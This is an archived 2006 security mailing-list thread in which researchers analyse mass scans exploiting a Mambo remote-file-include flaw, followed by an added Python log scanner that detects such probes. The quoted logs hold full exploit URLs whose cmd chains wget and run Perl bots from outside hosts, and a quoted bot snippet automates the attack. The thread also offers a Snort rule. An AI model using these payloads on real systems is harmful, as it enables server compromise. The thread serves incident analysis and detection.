OSEC

Re: High volume of Mambo scans (perlb0t)

From: Daniel Cid (danielcidyahoo.com.br)
Date: Mon May 15 2006 - 08:54:47 CDT


I was looking at the scripts they try to download and
it does not look like a common Perl bot (connecting
to IRC). It's also written in PHP and by a Brazilian
person (comments in Portuguese) and with terrible
code :) I didn't have time to fully look at it,
though.

These are the pages they access:

http://usuarios.lycos.es/athos666/d25/
http://usuarios.lycos.es/athos666/d25/therules25.dat
http://radius01.comete.ci/tool.gif

I'm attaching them just in case they remove
these pages (please be aware that they are
scripts, not gifs :)).

Thanks,

--
Daniel B. Cid
dcid ( at ) ossec.net

--- Jamie Riden <jamesreurope.com> wrote:

> Seems to have some kind of google search code for
> the particular
> vulnerability - haven't seen this before:
>
> if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M
> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");^M
> srand;^M
> my $itime = time;^M
> my ($cur_time);^M
> my ($exploited);^M
> $boturl=$2;^M
> $cur_time = time - $itime;$exploited = 0;^M
> while($1>$cur_time){^M
> $cur_time = time - $itime;^M
> urls=fetch();^M
> foreach $url (urls) {^M
> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Trying to exploit ".$url);^M
> $cur_time = time - $itime;^M
> my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;^M
> $url =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";^M
> $page = http_query($url);^M
> $exploited = $exploited + 1;^M
> }^M
> }^M
> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");^M
>
> This is a quick stab at a snort sig:
>
> alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 (msg: "BLEEDING-EDGE perlb0t Bot Reporting Scan/Exploit"; flow: to_server,established; content:"PRIVMSG|20|"; nocase; within: 80; tag: session, 20, packets; pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; within:16; pcre:"/(Exploiting|Exploited|Attacking|Scanning|perlb0t)/i"; classtype: trojan-activity; sid: xxxx; rev:1; )
>
> but I'm sure this could be improved.
>
> cheers,
> Jamie
>
> On 15/05/06, Jamie Riden <jamesreurope.com> wrote:
> > Looks like some sort of shellbot wanting to connect to an IRC channel
> > #abusers on abuser.hacked.in:8080.
> >
> > I've been seeing occasional probes for Mambo's index.php on and off
> > for a while now - the first part is similar to
> > http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
> > payloads are slightly different, though it always seems to end up with
> > an IRC bot of some kind.
> >
> > I usually see them coupled with scans for coppermine and other remote
> > include issues, plus xmlrpc probes.
> >
> > I think you're seeing an attempt to exploit issue#3 here -
> > http://secunia.com/advisories/18935/
> >
> > cheers,
> > Jamie
> >
> > On 14/05/06, Daniel Cid <danielcidyahoo.com.br> wrote:
> > > Since Thursday night I'm seeing a high volume of scans
> > > on different web servers for possibly the following
> > > vulns:
> > >
> > > http://secunia.com/advisories/14337/
> > > http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> > >
> > > However, they say the problem is on function.php and
> > > I'm seeing them on index.php. Can anyone confirm that?
> > >
> > > Some log samples:
> > >
> > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> >
> > --
> > Jamie Riden / jamesreurope.com / jamie.ridencomputer.org
> > NZ Honeynet project - http://www.nz-honeynet.org/
> >
>
>
> --
> Jamie Riden / jamesreurope.com / jamie.ridencomputer.org
> NZ Honeynet project - http://www.nz-honeynet.org/
>
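As an added example (not part of this thread, and not OSSEC or NZ Honeynet code), here is a small Python log check for the kind of Mambo remote-include probe shown in the log samples quoted above. It keys on a mosConfig_absolute_path query parameter whose value is a remote URL rather than on the requested script name, so it fires whether the probe hits index.php or another file, and it extracts the include host and any second-stage download URLs from the accompanying cmd parameter so they can be recorded as indicators. The sample lines are constructed from the entries quoted in the thread plus two benign lines; the Finding, check_line, parse_query and scan_log names are my own.

```python
"""Flag Mambo/Joomla remote-file-include probes in Apache access-log lines.

Added example, not code from the thread. The detection keys on a
mosConfig_absolute_path parameter that points at a remote URL, whatever
script was requested, and pulls out the include host plus any download
URLs found in a cmd parameter for indicator tracking.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# Apache common/combined log prefix: ip ident user [time] "method path proto" status
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# URLs embedded in a shell one-liner: stop at whitespace or a shell separator.
PAYLOAD_URL_RE = re.compile(r'(?:https?|ftp)://[^\s;&|"\']+', re.IGNORECASE)

# Constructed sample: the first two lines mirror entries quoted in the thread,
# the last two are benign requests (one with a local, non-remote path value).
SAMPLE_LOG = """200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2006:17:00:00 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [12/May/2006:17:01:00 -0300] "GET /index.php?_REQUEST[option]=com_content&mosConfig_absolute_path=/usr/local/mambo HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
"""


@dataclass
class Finding:
    src_ip: str
    timestamp: str
    script: str
    status: int
    include_url: str
    include_host: str
    payload_urls: List[str] = field(default_factory=list)


def parse_query(query: str) -> dict:
    """Split a raw query string on '&' and percent-decode keys and values.

    Done by hand rather than with urllib.parse.parse_qs so that the '?' and
    ';' characters inside the probe's values are kept exactly as logged.
    """
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params[unquote(key)] = unquote(value)
    return params


def check_line(line: str) -> Optional[Finding]:
    """Return a Finding for a remote-include probe, or None for anything else."""
    m = CLF_RE.match(line)
    if not m:
        return None  # not a log line in the expected format
    parts = urlsplit(m.group('path'))
    params = parse_query(parts.query)
    include = params.get('mosConfig_absolute_path', '')
    if not REMOTE_URL_RE.match(include):
        return None  # absent or local path: not a remote include attempt
    include_host = urlsplit(include).hostname or ''
    payload_urls = PAYLOAD_URL_RE.findall(params.get('cmd', ''))
    return Finding(
        src_ip=m.group('ip'),
        timestamp=m.group('ts'),
        script=parts.path,
        status=int(m.group('status')),
        include_url=include,
        include_host=include_host,
        payload_urls=payload_urls,
    )


def scan_log(text: str) -> List[Finding]:
    """Run check_line over every line of a log and collect the findings."""
    return [f for f in (check_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding.timestamp} {finding.src_ip} -> {finding.script} "
              f"include={finding.include_host} payloads={finding.payload_urls} "
              f"status={finding.status}")
```

The HTTP status is kept in each finding but does not gate it: the probes quoted in the thread all drew a 404 on the reporting host, and the same sources were seen against several web servers, so a miss here is still worth recording and the include and payload hosts are still worth blocking or watching for outbound connections.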



2552318609-tool.gif